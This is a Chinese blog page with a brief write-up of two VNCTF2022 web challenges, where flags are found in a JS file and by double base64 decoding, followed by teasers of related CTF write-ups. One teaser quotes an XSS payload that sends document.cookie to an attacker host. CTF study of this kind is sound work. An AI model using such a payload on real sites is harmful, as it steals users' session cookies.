VNCTF2022公开赛--web

最新推荐文章于 2025-03-13 19:59:50 发布

笵--

最新推荐文章于 2025-03-13 19:59:50 发布

阅读量4.2k

点赞数

文章标签： web安全

本文链接：https://blog.youkuaiyun.com/q1415500189/article/details/123109364

版权

本文介绍了两道游戏开发相关的解谜题目，第一题是GAMEv4.0签到题，提示flag隐藏在JS文件中。第二题涉及网络安全，通过抓包、base64解码等步骤揭示了flag。同时强调了base64解码的格式特征在解题过程中的重要性。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1.GAMEv4.0

签到题，flag就在js文件里，我还找了半天，太菜了我TAT

2.gocalc0

提示

抓包

base64解码

再次解码

发现flag。。

ps.一般base64解码有一定的格式，可以区分。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

笵--

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

VNCTF2022公开赛-misc-仔细找找（复现）

ookami6497的博客

03-12

1176

放大发现里面大多数都是白点，而且还混有其他有颜色的点，前面地方能看出vn两个字母参考这个大佬的博客说是要取出所有的杂色点大佬的代码 from PIL import Image img = Image.open(r'g:\share\20220212\flag.png') w, h = img.size res = Image.new('RGB', (w//50, h//31), 255) for x in range(w): for y in range(h): ...

[BUUCTF][VNCTF2022公开赛]web wp

m0_67403240的博客

03-09

955

GameV4.0 base64解码即可 newcalc0 镜像为node:lts-alpine，package.json全部为最新包 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json(

参与评论您还未登录，请先登录后发表或查看评论

NSSCTF(MISC)—[巅峰极客 2022 决赛]开端：strangeTempreture

最新发布

hzhfhsq的博客

03-13

140

追踪一下。

VNCTF2022公开赛

shinygod的博客

03-15

510

gocalc0 00x1预期解点击把session拿去解码一下（末尾有==base64解码一下）两次编码就出来了（本来我以为） 00x2非预期解 import ( _ "embed" "fmt" "os" "reflect" "strings" "text/template" "github.com/gin-contrib/sessions" "github.com/gin-contrib/sessions/cookie" "github.com/gin-gonic/gi

VNCTF2022 web wp

m0_67403240的博客

03-01

1225

GameV4.0 js/data.js下有段FLAG的base64加密 Vk5DVEYlN0JXZWxjb21lX3RvX1ZOQ1RGMjAyMiU3RA== 解码就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 非预期 xss，没有过滤，前几次一直不行，session解密木得flag，不知道最后怎么又可以了，www <script>window.open('http://ip:7777/'+document.cookie)</script> 然后把s

VNCTF2022公开赛 Web gocalc0

cadandme的博客

02-13

751

粗心大意要不得

[VNCTF2022]部分wp

Huamang的博客

02-23

751

VNCTF2022

VNCTF2022的wp

sln_1550的博客

02-14

1305

排名第6，逆向没有AK，差一题（要不然就第二了），不过发现自己的不足也算是有进步。 CRYPTO: ezmath n取到直接乘4返回即可 MISC 问卷略仔细找找图片中有间隔几乎相等的杂色点，写脚本取出： from PIL import Image img = Image.open(r'g:\share\20220212\flag.png') w, h = img.size res = Image.new('RGB', (w//50, h//31), 255) for x in range(w)

VNCTF 2022 web

Blazing-Angel的博客

02-16

1861

前言复现一下vnctf GameV4.0 签到 newcalc0 源码 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json()); app.use(express.static("s

CTF工控流量分析-题集4-[巅峰极客 2022 决赛]开端：strangeTempreture

m0_51198141的博客

12-01

760

巅峰”小组走进尚未测试的时光机器中，为躲避“九婴”的追踪，队员立刻拿出设备进行扫描，果然传感器探测到了异常数据，你随即使用设备开始分析了起来......熟悉flag的特征就没有难点，否则只能逐个分析夹杂的数据排除了。

VNCTF 2022 misc复现

qq_74710163的博客

02-22

342

Strange flag prize wheel

[祥云杯 2022]strange_forensics writeup by 王八七七

weixin_52365980的博客

06-12

245

存在两个用户，要想知道用户名密码，我们首先要知道linux系统文件/etc/shadow的文件内容格式。判断出可能存在多段flag，而linux大多是基于ubuntu的，使用strings命令进行字符串搜索。发现压缩包文件，手动提取发现压缩包损坏，将0000改为0900，这里应该是一个加密。接着使用winhex查看有没有敏感文件头如8950、504b、FFD8等等。压缩包恢复正常，使用破解工具进行暴力破解，得到密码123456。用户名:$密码md5，因此我们根据这样的格式再次进行搜索。

VNCTF2022 WriteUp

mumuzi的博客

02-13

3367

VNCTF2022

[VNCTF2022]easyj4va

snowlyzz的博客

11-26

1368

vnctf easyjava复现

VNCTF2022 web全复现

优快云Di_Di的博客

03-14

384

在data.js文件中搜索到了关键词flag，且后面附着着一个base64编码的字符串，解码试试得到flag，再将其url解码一下就行Copy。

VNCTF2024-misc方向部分wp

Rick66Ashley的博客

02-17

1872

那就看看配置文件吧.dll略过,据说是播放音乐的,resources文件夹里有音乐图片和字体,图片里什么也没发现还剩一个着色器文件夹其中的particle应该是渲染小球的,post_process应该是震动效果,至于text就是文字,应该是我们要找的flag,还有一个sprite去问了一下gpt,这里面渲染游戏元素的颜色,比如砖头之类的颜色,代码是。2.乘除,合成分离运算在Math,类型转换typeconverter,然后文件操作是fileoperator,文件源source,文件处理结果sink)

VNCTF 公开赛 2021 factor

blog

03-14

1528

[VNCTF 2021] factor task.py from Crypto.Util.number import * from gmpy2 import * from secret import flag from icecream import * # flag = b'SYC{123123123123123}' def get_public_key(d): while 1: p, q = getPrime(512), getPrime(512) N, phi,

vnctf 2024pwn

02-10

### 关于 vnctf 2024 Pwn 比赛的信息对于寻找特定竞赛如 vnctf 2024 pwn 的信息，通常这类赛事会通过官方渠道发布详细的参赛指南、规则说明以及提供必要的资源链接。具体到 vnctf 2024 pwn 比赛，可以关注以下几个方面来获取最新最权威的消息： #### 官方网站与公告访问 VnCTF 官网是最直接的方式之一。官方网站不仅包含了历年的比赛回顾，还会有最新的活动通知和报名入口。 #### 社交媒体平台许多网络安全竞赛都会利用社交媒体进行宣传推广。Twitter, Facebook 或者 LinkedIn 上的相关账号可能会分享更多幕后故事和技术细节。 #### 技术论坛与社区讨论区像 Reddit 的 r/netsec 和 Hacker News 这样的在线社区经常有安全爱好者交流心得并共享有价值的资料。此外，国内的技术博客园地如 FreeBuf、看雪论坛也是不错的选择。 #### 参考以往的比赛材料虽然当前没有找到针对 vnctf 2024 pwn 特定的内容[^1]，但是可以通过研究往届比赛题目及其解决方案来准备今年的比赛。这有助于理解命题趋势和技术难点。 ```bash # 使用 tshark 查找符合条件的数据包示例命令 tshark -r a.pcap -T fields -e data.data -Y "data.len==12" ``` 此命令用于筛选长度为12字节的有效载荷数据，并显示其十六进制表示形式。